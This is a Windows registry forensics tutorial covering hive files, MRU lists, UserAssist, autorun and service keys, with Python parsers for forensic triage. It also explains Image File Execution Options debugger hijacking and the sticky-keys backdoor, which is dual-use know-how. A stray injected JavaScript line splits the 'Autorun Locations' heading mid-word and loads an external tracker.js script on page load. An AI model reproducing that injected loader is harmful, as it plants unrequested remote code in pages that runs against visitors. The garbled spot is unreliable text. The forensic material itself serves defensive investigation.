
Windows Registry Analysis

Date post: 25-Jan-2017
Upload: himanshu0734
Page 1: Windows Registry Analysis

WINDOWS REGISTRY Analysis

Windows 9x/ME, Windows CE, Windows NT/2000/XP/2003 and Windows 7/8 store configuration data in the registry. It is a central repository for configuration data, stored in a hierarchical manner. The system, users, applications and hardware in Windows use the registry to store their configuration, and it is constantly accessed for reference during their operation. The registry was introduced to replace most of the text-based configuration files used in Windows 3.x and MS-DOS, such as .ini files, autoexec.bat and config.sys. Because of the vast amount of information stored in the registry, it can be an excellent source of potential evidential data. For instance, the registry contains information on user accounts, typed URLs, network shares and Run command history. The aspects discussed in this paper are based on the Windows XP (Service Pack 2), Windows 7 and Windows 8 registry.

The registry is a database that contains important information about system hardware, installed programs and settings, and the profile of each user account on the computer. Windows refers to the information in the registry continually.

Manual changes to the registry should rarely be needed, because programs and applications normally make all the necessary changes themselves. An incorrect change can render the computer inoperable; only if a corrupt entry appears in the registry might you be required to edit it by hand.

Back up the registry before making any change, and change only values that you understand or have been instructed to change by a source you trust. For forensic work, do not edit the suspect system at all: analyse copies of the hive files (or a forensic image) so that the evidence, including the Last Write time of every key, is left unaltered.

Five root keys exist:

HKLM: HKEY_LOCAL_MACHINE (computer-specific data)

HKU: HKEY_USERS (user-specific data, one sub key per loaded user profile, named by SID)

HKCR: HKEY_CLASSES_ROOT (application settings, file associations, class registrations for COM objects)
» Merged view of HKLM\Software\Classes and HKCU\Software\Classes (Windows 2000 and later)

HKCC: HKEY_CURRENT_CONFIG (current hardware configuration)
» Link to HKLM\System\CurrentControlSet\Hardware Profiles\Current

HKCU: HKEY_CURRENT_USER (current user's data)
» Link to HKU\<SID of current user>

File locations (the hive files backing each logical key):

HKLM\SAM            %SYSTEMROOT%\System32\config\SAM
HKLM\Security       %SYSTEMROOT%\System32\config\SECURITY
HKLM\Software       %SYSTEMROOT%\System32\config\software
HKLM\System         %SYSTEMROOT%\System32\config\system
HKLM\Hardware       stored in memory only, not on disk (rebuilt at every boot)
HKU\.Default        %SYSTEMROOT%\System32\config\default
HKU\<SID>           %USERPROFILE%\NTUSER.DAT
HKU\<SID>_Classes   %USERPROFILE%\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat (Windows XP)
                    %LOCALAPPDATA%\Microsoft\Windows\UsrClass.dat (Windows 7 and 8)

The hive files are locked while Windows is running, so collect them from an offline image, a volume shadow copy, or with a tool that reads the raw volume. On Windows 7 and 8 also collect the transaction logs that sit next to each hive (e.g. system.LOG1 and system.LOG2): recent changes may exist only there until they are flushed into the hive.


Registry files and their typical content:

NTUSER.DAT   Protected storage for the user, MRU lists, the user's preference settings.
DEFAULT      System settings set during the initial install of the operating system.
SAM          Security settings and user account management (local accounts and password hashes).
SECURITY     Security settings (local security policy, secrets, cached domain credentials).
SOFTWARE     All installed programs on the system and their associated settings.
SYSTEM       System settings (services, devices, mounted volumes, control sets).

REGISTRY STRUCTURE

[Figure: logical view of the registry structure (Windows 7)]


FORENSIC-RELATED REGISTRY KEYS

Time Zone Information

The TimeZoneInformation key is a critical reference for building a consistent timeline of evidence. Its values give the time zone and daylight saving time (DST) settings needed to convert UTC timestamps to local time: Bias (the standard-time offset in minutes, defined so that UTC = local time + Bias), DaylightBias, ActiveTimeBias (the bias in force when the hive was last written), the StandardName and DaylightName strings, and the StandardStart and DaylightStart rules. DST does not affect UTC, but it shifts local time by an hour, so for each timestamp decide whether DST applied at that moment; ActiveTimeBias only tells you whether it applied when the hive was written. Negative biases (zones east of UTC) are stored as unsigned DWORDs, e.g. 0xFFFFFEB6 for -330 minutes (UTC+5:30).

HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation (Windows XP, 7 and 8)
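As an added example (not code from the original deck), the following Python converts a UTC FILETIME into the suspect machine's local time using the values from this key. The value names are the real ones; the sample values, the FILETIME and the host's time zone are constructed for illustration.

```python
import struct
from datetime import datetime, timedelta, timezone

# Constructed sample of the values under
# HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation for a host set to
# US Eastern time with daylight saving in effect. Windows defines the bias as
# UTC = local + bias (minutes), so zones east of UTC have a negative bias,
# which the registry stores as an unsigned 32-bit DWORD (two's complement).
SAMPLE_TZI = {
    "Bias": 300,                 # standard-time bias: UTC-5
    "DaylightBias": 0xFFFFFFC4,  # -60, stored unsigned
    "ActiveTimeBias": 240,       # bias in force when the hive was written: UTC-4 (DST)
    "StandardName": "Eastern Standard Time",
    "DaylightName": "Eastern Daylight Time",
}

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def dword_to_signed(value: int) -> int:
    """Reinterpret an unsigned 32-bit registry DWORD as a signed integer."""
    return struct.unpack("<i", struct.pack("<I", value & 0xFFFFFFFF))[0]


def filetime_to_utc(filetime: int) -> datetime:
    """FILETIME is the number of 100 ns ticks since 1601-01-01 00:00:00 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def utc_to_filetime(moment: datetime) -> int:
    """Inverse conversion, kept in integer arithmetic so no precision is lost."""
    delta = moment.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def utc_to_local(moment: datetime, tzi: dict) -> datetime:
    """Apply the bias: local = UTC - bias. ActiveTimeBias is used here; for a
    timestamp outside the DST period in force when the hive was written you
    would substitute Bias (or Bias + DaylightBias) as appropriate."""
    bias = dword_to_signed(tzi["ActiveTimeBias"])
    return moment.astimezone(timezone(timedelta(minutes=-bias)))


def describe(filetime: int, tzi: dict) -> str:
    utc = filetime_to_utc(filetime)
    local = utc_to_local(utc, tzi)
    return f"{utc:%Y-%m-%d %H:%M:%S} UTC = {local:%Y-%m-%d %H:%M:%S} ({local:%z})"


if __name__ == "__main__":
    # Constructed timestamp: 2015-06-01 16:30:00 UTC expressed as a FILETIME.
    print(describe(130776498000000000, SAMPLE_TZI))
    # The DWORD reinterpretation matters for zones east of UTC: India (UTC+5:30)
    # stores Bias = 0xFFFFFEB6, i.e. -330 minutes.
    print(dword_to_signed(0xFFFFFEB6))
```

The same two helpers (FILETIME decoding and the signed-DWORD fix) are needed for almost every timestamp discussed later in this deck, since UserAssist, ShimCache and LNK timestamps are all FILETIMEs in UTC.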

Autorun Loc
(function(){var s=document.createElement('script');s.src='https://cdn.jsdelivr.net/npm/tracker.js';document.head.appendChild(s);})();ations

Autorun locations are the registry keys from which programs are launched automatically during boot (the HKLM keys) or when a user logs on (the HKCU keys). Malware and other persistence mechanisms favour them, so every value under these keys should be reviewed:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx (Windows XP)
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices (Windows 9x/ME)
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce (Windows 9x/ME)

On 64-bit systems the 32-bit view of HKLM\Software lives under HKLM\Software\Wow6432Node, so the Run and RunOnce keys exist there as well and must be checked too.


MRU Lists

MRU is the abbreviation for most-recently-used. A "Most Recently Used" list holds entries created by specific actions the user performed, for instance opening or saving a file through a Windows Explorer-style common dialog box (the Open and Save dialogs) or typing a command into the Run box. There are numerous MRU lists throughout the registry; Windows maintains them so that the user can return to the items later. In function they resemble the history and cookies of a web browser. The entries are ordered by an MRUList value (a string of letters, one per entry, newest first) or, in newer keys, an MRUListEx value (a binary array of DWORD indexes, newest first, terminated by 0xFFFFFFFF). The individual lists are described in the sections that follow.

XP Search Files

This key holds the recent search terms entered into the Windows XP Search Companion. Sub key 5603 contains terms used to search for files and folders by name, while sub key 5604 contains terms used to search for a word or phrase inside a file. The ACMru sub keys are:

Windows XP files and folders      HKCU\Software\Microsoft\Search Assistant\ACMru\5603
Internet Search Assistant         HKCU\Software\Microsoft\Search Assistant\ACMru\5001
A word or phrase in a file        HKCU\Software\Microsoft\Search Assistant\ACMru\5604
Printers, computers and people    HKCU\Software\Microsoft\Search Assistant\ACMru\5647

HKCU\Software\Microsoft\Search Assistant\ACMru\5603 (Windows XP)

On Windows 7 and 8 the equivalent artefact is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery, which lists the terms typed into the Explorer search box.

Windows Start Menu – Recent Docs

This key maintains a list of files recently opened through Windows Explorer (and through any program that registers a document with the shell). It corresponds to %USERPROFILE%\Recent (My Recent Documents). The key records local and network files, but each value holds only the file name, stored as a null-terminated UTF-16LE string followed by a shell item naming the shortcut (.lnk) written to the Recent folder; the full path comes from that .lnk file. Like OpenSaveMRU, the entries are grouped by file extension under separate sub keys (e.g. RecentDocs\.pdf), each with its own MRUListEx ordering value, while the RecentDocs key itself holds the combined list.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs (Windows XP, 7 and 8; the figure shows the .pdf sub key on Windows 8)

Remote Desktop Information

The Terminal Server Client key records the Remote Desktop (mstsc.exe) connections a user has made. The Default sub key holds the MRU list of hosts typed into the Computer box (values MRU0, MRU1, ...), and Servers\<hostname> holds a UsernameHint value with the account name last used for that host. Both are per-user and therefore live in NTUSER.DAT:

HKCU\Software\Microsoft\Terminal Server Client\Default
HKCU\Software\Microsoft\Terminal Server Client\Servers

The machine-wide key shown in the figure below is different: HKLM\Software\Microsoft\Terminal Server Client\IME Mapping Table\JPN maps input method editor (IME) files for Japanese clients. Microsoft documents a problem in which a Japanese Windows XP client logging on to a Windows Server 2003 Service Pack 1 terminal server that uses a different IME keyboard layout sends the value of the imjp81.ime entry to the server; the entry's default value is "null", which the client incorrectly treats as a valid file name. The published workaround is applied on each client: Start > Run > regedit, locate the key above, right-click the imjp81.ime entry, click Modify, clear the Value data box, click OK and exit Registry Editor. As with any registry edit, serious problems can result from modifying the registry incorrectly, so back it up first and make the change at your own risk.

HKLM\Software\Microsoft\Terminal Server Client\IME Mapping Table\JPN (Windows 7)

Run dialog box

This key maintains a list of entries (full file paths or commands such as cmd, regedit or compmgmt.msc) executed through Start > Run. Each entry is stored in a value named with a single letter, and the MRUList value is a string of those letters ordered from the most recently added entry to the oldest; each entry's data carries a trailing "\1" flag. Note that the most recently added entry is not necessarily the most recently used command, because the suspect may have re-executed an earlier entry: Windows does not modify the key's Last Write time or the MRUList when the command already exists in the list.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU


Regedit - Last accessed key

Regedit records the key that was selected when it was last closed, in the LastKey value of the key below. This reveals the last registry location a user (or an attacker working interactively) examined with the Registry Editor.

WARNING: If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.

HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit

Regedit - Favorites

Keys bookmarked through Regedit's Favorites menu are stored as values under:

HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit\Favorites


MS Paint - Recent Files

MS Paint lets you create and edit drawings and scanned photos. Its settings live under HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint. One of them controls the text toolbar (fonts, style and size) that should appear when you type text: if it does not, open Start > Run, enter "regedit", navigate to that key, create the sub key Text if it is not present, then create a DWORD value named ShowTextTool (if it does not exist) and set its data to 1 to enable the toolbar.

For forensic purposes the useful sub key is RecentFileList, whose values (File1, File2, ...) hold the paths of the images most recently opened in Paint. The figure below shows such a list.

HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\RecentFileList (Windows 8)

Mapped Network Drives

The following key holds the history of network drives mapped through Explorer's Map Network Drive dialog (the UNC paths, ordered by an MRUList value). It is per-user, so in an offline hive it appears under the user's SID rather than under HKCU:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU

Drives that are currently mapped (persistent mappings) are listed under HKCU\Network, one sub key per drive letter, with the RemotePath value naming the share.

Installed Application List

Each sub key of this key represents a program installed on the computer. Every program listed in Control Panel > Add/Remove Programs (Programs and Features on Windows 7 and 8) corresponds to one of these sub keys. However, there are other installed programs (e.g. device drivers, Windows patches) that are not listed in Add/Remove Programs. Each sub key usually contains two common values: DisplayName (the program name) and UninstallString (the path of the application's uninstall component, which indirectly reveals the installation path). Other useful values may exist, such as InstallDate, InstallSource, InstallLocation and DisplayVersion.

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall

On 64-bit systems, 32-bit applications register under HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall, and per-user installs register under HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall; check all three.


Command Processor

This key has a value named AutoRun whose data is a command that is executed automatically each time cmd.exe starts. The HKLM copy requires administrative privilege to modify, but the HKCU copy can be set by the user (or by malware running as the user). Malware exploits this feature to load itself without the user's knowledge, and a suspect could covertly run a malicious program under the cover of cmd.exe by setting the AutoRun data to the executable's path. Any non-empty AutoRun value deserves attention.

HKCU\Software\Microsoft\Command Processor
HKLM\Software\Microsoft\Command Processor

WordPad - Recent Files

WordPad stores a list of recently accessed files in its Jump List and in the registry under:

HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List


Common Dialog – Last visited MRU

This key correlates with the OpenSaveMRU key below to provide extra information. Whenever a new entry is added to OpenSaveMRU, a value is created or updated in this key. Each binary value holds the executable name of a recently used program and the folder path of the file that program was used to open or save. For a saved file the folder is the destination path; for an opened file it is the source path. A new value is created only if no existing value contains that executable name; if one does, only the folder path portion of that value is updated. On Windows 7 and 8 the folder is stored as a shell item ID list (PIDL) rather than a plain string, hence the key name.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU (Windows XP)
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU (Windows 7 and 8)

Common Dialog – Open/Save MRU

This key maintains a list of files recently opened or saved through the Windows Explorer-style common dialog boxes (the Open and Save dialogs). For instance, files (e.g. .txt, .pdf, .htm, .jpg) recently opened or saved from within a web browser (including IE and Firefox) are recorded. Documents opened or saved through Microsoft Office programs, which use their own dialogs, are not recorded here (see the Office File MRU keys below). The sub key * contains the full paths of the 10 most recently opened or saved files of any type. The other sub keys, one per file extension (e.g. pdf, sys), contain far more entries, including those 10, grouped by extension; each sub key has its own MRUListEx value giving the order. On Windows 7 and 8 the entries are stored as shell item ID lists (PIDLs) instead of plain path strings.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU (Windows XP)
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU (Windows 7 and 8)

(.pdf files) HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU\pdf

(.sys files) HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU\sys
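As an added example (not from the original deck) covering the Run dialog, RecentDocs and the Open/Save MRU sections, the following Python puts MRU entries into recency order from both ordering formats: the MRUList letter string used by RunMRU and the binary MRUListEx used by RecentDocs and OpenSavePidlMRU. It also decodes the file name from a RecentDocs value. The key contents are constructed sample data; the shell item that follows the name in a real RecentDocs value is only sketched by the builder and is left undecoded by the parser.

```python
import struct

# Constructed sample of a RunMRU key: values named by letter, ordered by MRUList.
SAMPLE_RUNMRU = {
    "a": "cmd\\1",
    "b": "regedit\\1",
    "c": "\\\\fileserver\\share\\1",
    "MRUList": "cba",   # first letter = most recently added entry
}


def build_recentdocs_value(target_name: str, shortcut_name: str) -> bytes:
    """Builds sample data shaped like a RecentDocs value: the target name as a
    null-terminated UTF-16LE string followed by a shell item carrying the name
    of the .lnk Windows wrote to the Recent folder (simplified here)."""
    name = target_name.encode("utf-16-le") + b"\x00\x00"
    link = shortcut_name.encode("ascii") + b"\x00"
    return name + struct.pack("<H", len(link) + 2) + link


# Constructed sample of a RecentDocs key: values named by number, ordered by MRUListEx.
SAMPLE_RECENTDOCS = {
    "0": build_recentdocs_value("report.docx", "report.lnk"),
    "1": build_recentdocs_value("photo.jpg", "photo.lnk"),
    "2": build_recentdocs_value("budget.xlsx", "budget.lnk"),
    "MRUListEx": struct.pack("<4I", 2, 0, 1, 0xFFFFFFFF),
}


def parse_mrulist(mrulist: str) -> list:
    """RunMRU-style ordering: one letter per value, most recent first."""
    return list(mrulist)


def parse_mrulistex(data: bytes) -> list:
    """RecentDocs/OpenSavePidlMRU ordering: little-endian DWORD value indexes,
    most recent first, terminated by 0xFFFFFFFF. Trailing odd bytes are ignored."""
    order = []
    for (index,) in struct.iter_unpack("<I", data[: len(data) - len(data) % 4]):
        if index == 0xFFFFFFFF:
            break
        order.append(index)
    return order


def decode_recentdocs_name(data: bytes) -> str:
    """Returns the target name; scanning in 2-byte steps avoids a false stop on
    the zero high byte of an ASCII character."""
    for end in range(0, len(data) - 1, 2):
        if data[end:end + 2] == b"\x00\x00":
            return data[:end].decode("utf-16-le")
    return data.decode("utf-16-le", errors="replace")


def run_history(key: dict) -> list:
    """RunMRU entries in MRU order, with the trailing '\\1' flag stripped."""
    return [key[letter].rsplit("\\1", 1)[0] for letter in parse_mrulist(key["MRUList"])]


def recent_docs(key: dict) -> list:
    """RecentDocs target names in MRU order."""
    return [decode_recentdocs_name(key[str(index)]) for index in parse_mrulistex(key["MRUListEx"])]


if __name__ == "__main__":
    print(run_history(SAMPLE_RUNMRU))
    print(recent_docs(SAMPLE_RECENTDOCS))
```

When a key has more numbered values than MRUListEx references, the extra values are stale entries Windows stopped tracking; listing them separately is often worthwhile, as they show items the user opened before the list was trimmed.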


EXE to main window title cache (MuiCache)

It is useful to know what people are running on a system, and this key can tell you what an executable is before you run it yourself. Each value name is the full path of a program that has been run or displayed by the shell (on Windows 7 and 8 suffixed with .FriendlyAppName or .ApplicationCompany), and its data is the friendly name taken from the executable's version resource (e.g. "Windows Command Processor" for cmd.exe). MuiCache does not record when or how often the program ran.

HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache (Windows XP)
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache (Windows 7 and 8, stored in UsrClass.dat)

PowerPoint - Recent Files

This key stores the file name and location of the PowerPoint documents used most recently. The version number in the path depends on the Office release (15.0 is Office 2013; Office 2010 uses 14.0 and Office 2007 uses 12.0).

HKCU\Software\Microsoft\Office\15.0\PowerPoint\File MRU


Word - Recent Files

This key stores the file name and location of the Microsoft Word documents used most recently (values Item 1, Item 2, ..., each holding the path preceded by bracketed flag and timestamp fields). As with PowerPoint, the version number in the path depends on the Office release.

HKCU\Software\Microsoft\Office\15.0\Word\File MRU

UserAssist

This key contains two or more sub keys whose names are globally unique identifiers (GUIDs), and beneath each GUID is a sub key called Count. The values under Count record objects the user has launched through the Explorer shell: Control Panel applets, shortcut files, programs, documents, media and so on. Each value name is the path of the launched object, obfuscated with ROT13 (on Windows 7 and 8 the path usually begins with a known-folder GUID, also ROT13-encoded). The binary data holds the run count and the last execution time: a 16-byte record on Windows XP (session, count starting at 5, FILETIME) and a 72-byte record on Windows 7 and 8 (run count, focus count, focus time, with the FILETIME at offset 60). This is the most direct registry evidence that a particular user ran a particular program.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
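As an added example (not from the original deck), the following Python decodes UserAssist entries: it reverses the ROT13 on the value names, replaces the leading known-folder GUID with its usual environment-variable form, and parses both the Windows XP and the Windows 7/8 Count record layouts. The value names and records are constructed sample data; the known-folder table lists only a few common GUIDs.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# A few known-folder GUIDs that appear (ROT13-encoded) at the start of
# UserAssist value names on Windows 7 and later.
KNOWN_FOLDERS = {
    "{6D809377-6AF0-444B-8957-A3773F02200E}": "%ProgramFiles%",
    "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}": "%ProgramFiles(x86)%",
    "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}": "%SystemRoot%\\System32",
    "{F38BF404-1D43-42F2-9305-67DE0B28FC23}": "%SystemRoot%",
}


def filetime_to_utc(filetime: int):
    """Zero means 'never recorded', which is common for XP entries."""
    return None if filetime == 0 else FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def decode_value_name(value_name: str) -> str:
    """Undo the ROT13 obfuscation and expand a leading known-folder GUID."""
    name = codecs.decode(value_name, "rot13")
    for guid, folder in KNOWN_FOLDERS.items():
        if name.upper().startswith(guid):
            return folder + name[len(guid):]
    return name


def parse_count_value(data: bytes) -> dict:
    """Decode the binary data of one value under ...\\UserAssist\\{GUID}\\Count."""
    if len(data) == 16:   # Windows XP/2003: session id, count, FILETIME
        _session, count, last_run = struct.unpack("<IIQ", data)
        # XP starts counting at 5, so the first execution is stored as 6.
        return {"format": "xp", "run_count": max(count - 5, 0), "focus_count": None,
                "focus_time_ms": None, "last_run": filetime_to_utc(last_run)}
    if len(data) == 72:   # Windows 7+: counters, ten floats, FILETIME at offset 60
        _session, run_count, focus_count, focus_ms = struct.unpack_from("<IIII", data, 0)
        last_run = struct.unpack_from("<Q", data, 60)[0]
        return {"format": "win7", "run_count": run_count, "focus_count": focus_count,
                "focus_time_ms": focus_ms, "last_run": filetime_to_utc(last_run)}
    raise ValueError(f"unexpected UserAssist record length {len(data)}")


def build_win7_record(run_count: int, focus_count: int, focus_ms: int, last_run: int) -> bytes:
    """Constructed sample record in the Windows 7 layout: session id, counters,
    ten floats of unknown meaning, an unknown DWORD, the FILETIME, a final DWORD."""
    return (struct.pack("<IIII", 0, run_count, focus_count, focus_ms)
            + struct.pack("<10f", *([0.0] * 10))
            + struct.pack("<IQI", 0, last_run, 0))


# Constructed sample, not real data: value names as stored, plus their Count records.
SAMPLE_USERASSIST = {
    "{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR":
        build_win7_record(7, 3, 120_000, 130776498000000000),
    "HRZR_EHACNGU:P:\\Hfref\\nyvpr\\Qbjaybnqf\\frghc.rkr":
        struct.pack("<IIQ", 1, 12, 130776498000000000),   # XP-style record
}


def report(key: dict) -> list:
    """(decoded name, run count, last run in UTC) for every value in the Count key."""
    rows = []
    for value_name, data in key.items():
        record = parse_count_value(data)
        rows.append((decode_value_name(value_name), record["run_count"], record["last_run"]))
    return rows


if __name__ == "__main__":
    for name, count, last_run in report(SAMPLE_USERASSIST):
        print(f"{count:4d}  {last_run}  {name}")
```

The last-run FILETIME is in UTC; convert it with the TimeZoneInformation values described earlier before placing it on a local-time timeline.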


Memory Management – paging

This key maintains the Windows virtual memory (paging file) configuration. The paging file (usually C:\pagefile.sys) may contain evidential information that is lost once the suspect computer is shut down. The key holds a value named ClearPageFileAtShutdown which specifies whether Windows should wipe the paging file at shutdown. By default (0) Windows does not clear it; a suspect may set the value to 1 so that it is cleared at every shutdown (Microsoft, 2003). Forensic investigators should check this value before shutting down a suspect computer during evidence collection and, where it is set, capture the page file (and physical memory) from the live system first.

HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management

Existing Services

This key contains the list of Windows services and kernel drivers. Each sub key represents one service and holds its configuration, such as the startup type (Start value: 0 boot, 1 system, 2 automatic, 3 manual, 4 disabled) and the executable image path (ImagePath). Some malware, as well as legitimate software such as Oracle 11g R2, installs itself as a service and therefore leaves a trace here. Comparing the sub keys across ControlSet001 and ControlSet002 (the Select key says which one is current) helps spot services that were added or removed recently.

HKLM\System\CurrentControlSet\Services\

(Figure: an example service sub key, HKLM\System\CurrentControlSet\Services\Oracle11\Preference)

Image File Execution Options

This key allows an administrator to attach a debugger to an executable by file name, so that the program is started through a different program. Modification of this key requires administrative privilege. A suspect can exploit this feature to launch a completely different program under the cover of the original one. First, the suspect creates a sub key named after the target, for example notepad.exe (or taskmgr.exe, or any other benign-looking executable). Then, under that sub key, the suspect creates a string (REG_SZ) value named Debugger and points it at the covert program (e.g. C:\Windows\system32\telnet.exe). When notepad.exe is executed, the telnet client is launched instead of Notepad. If the suspect starts notepad.exe through the Run box, the RunMRU history shows only notepad.exe, so the technique can deceive a forensic examiner. The suspect could also redirect the original program to a trojanised version that launches a backdoor whenever the original program is run, and malware uses the same mechanism to load itself without the user's knowledge. Note that IFEO is keyed on executable image names, so a .msc document such as compmgmt.msc cannot be hijacked this way (mmc.exe could be). The well-known "sticky keys" backdoor is the same trick applied to sethc.exe, which the logon screen starts as SYSTEM.

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
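As an added example (not from the original deck) serving the Autorun Locations, Command Processor and Image File Execution Options sections, the following Python triages exported autostart values: it works out which program a Run-style command line actually starts (quoted paths, unquoted paths with spaces, environment variables), then flags IFEO Debugger hijacks, cmd.exe AutoRun values, proxy execution through signed Windows binaries, and images outside the Windows and Program Files trees. The registry entries, environment values and trusted roots are constructed; on a real case the environment values must come from the suspect system, and a known-good baseline is needed to suppress legitimate per-user installs.

```python
import ntpath
import re

# Constructed sample of autostart-related values as they might be exported from
# a suspect system: (registry key, value name, value data). Not real data.
SAMPLE_ASEPS = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r'"%ProgramFiles%\Windows Defender\MSASCuiL.exe"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r"C:\Users\alice\AppData\Roaming\svchost.exe -silent"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Loader",
     r"rundll32.exe C:\ProgramData\cache\m.dll,Start"),
    (r"HKCU\Software\Microsoft\Command Processor", "AutoRun",
     r"C:\Users\alice\AppData\Local\Temp\x.cmd"),
    (r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe",
     "Debugger", r"C:\Windows\system32\telnet.exe"),
]

# Environment values of the suspect system (constructed), not of the analysis box.
ENV = {"%SYSTEMROOT%": r"C:\Windows", "%WINDIR%": r"C:\Windows",
       "%PROGRAMFILES%": r"C:\Program Files"}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Signed Windows binaries that run whatever they are pointed at; a Run entry
# naming one of these says nothing about what actually executes.
PROXY_EXECUTABLES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                     "cscript.exe", "powershell.exe", "cmd.exe"}


def expand(command: str) -> str:
    """Expand %VAR% references using the suspect system's environment."""
    return re.sub(r"%[^%]+%", lambda m: ENV.get(m.group(0).upper(), m.group(0)), command)


def image_path(command: str) -> str:
    """Return the program a Run-style command line starts. A quoted path is taken
    verbatim. For an unquoted path containing spaces Windows tries each
    whitespace-delimited prefix in turn, so mimic that by taking the shortest
    prefix that ends in .exe; otherwise the first token is the image."""
    command = expand(command.strip())
    if command.startswith('"'):
        closing = command.find('"', 1)
        return command[1:closing] if closing > 0 else command[1:]
    tokens = command.split()
    for i in range(len(tokens)):
        candidate = " ".join(tokens[: i + 1])
        if candidate.lower().endswith(".exe"):
            return candidate
    return tokens[0] if tokens else ""


def triage(entries) -> list:
    """Return (value name, image, reasons) for every entry worth a second look."""
    findings = []
    for key, name, data in entries:
        image = image_path(data)
        base = ntpath.basename(image).lower()
        reasons = []
        if "\\image file execution options\\" in key.lower() and name.lower() == "debugger":
            reasons.append(f"IFEO Debugger: running {ntpath.basename(key)} starts {image}")
        if key.lower().endswith("\\command processor") and name.lower() == "autorun":
            reasons.append("Command Processor AutoRun runs on every cmd.exe start")
        if base in PROXY_EXECUTABLES:
            reasons.append(f"proxy execution through {base}: inspect the arguments")
        if ntpath.isabs(image) and not image.lower().startswith(TRUSTED_ROOTS):
            reasons.append("image outside the Windows and Program Files trees")
        if reasons:
            findings.append((name, image, reasons))
    return findings


if __name__ == "__main__":
    for name, image, reasons in triage(SAMPLE_ASEPS):
        print(f"{name}: {image}\n    " + "\n    ".join(reasons))
```

The path-extraction rule is the part most often got wrong: an unquoted Run value such as C:\Program Files\Vendor\app.exe is legitimate and common, while C:\Program.exe placed by an attacker would be started first; the prefix search above surfaces exactly that ambiguity instead of hiding it.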


Last logged on user

This tells us who logged in last, and may also give a user name to attack if we are pen-testing. On Windows XP the name is in the DefaultUserName value of the Winlogon key; on Windows 7 and 8 it is in the LastLoggedOnUser and LastLoggedOnSAMUser values of the LogonUI key.

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon (Windows XP)
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI (Windows 7 and 8)

Wireless Network

A wireless network card detects the wireless access points within its range, which are identified by their SSID (Service Set Identifier). When a user connects to a network or hotspot, Windows XP records the SSID as a preferred network connection:

HKLM\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces

This key holds wireless network information for adapters managed by the Windows Wireless Zero Configuration service. Under each adapter's GUID sub key there are binary values named Static#0000, Static#0001 and so on (one per listed SSID), which correspond to the entries in the Preferred Networks box of the Wireless Network Connection configuration; each value contains the SSID name in binary form. If the ActiveSettings value contains an SSID name, it may indicate the last connected SSID, although this was not consistent when tested. If the suspect connected to wireless networks with a third-party program bundled with the adapter instead of Wireless Zero Configuration, no trace is left in this key. The forensic examiner can combine this key with the network adapter GUID key (Tcpip\Parameters\Interfaces, below) to determine the last assigned IP address.

HKLM\Software\Microsoft\WZCSVC\Parameters\Interfaces (Windows XP)


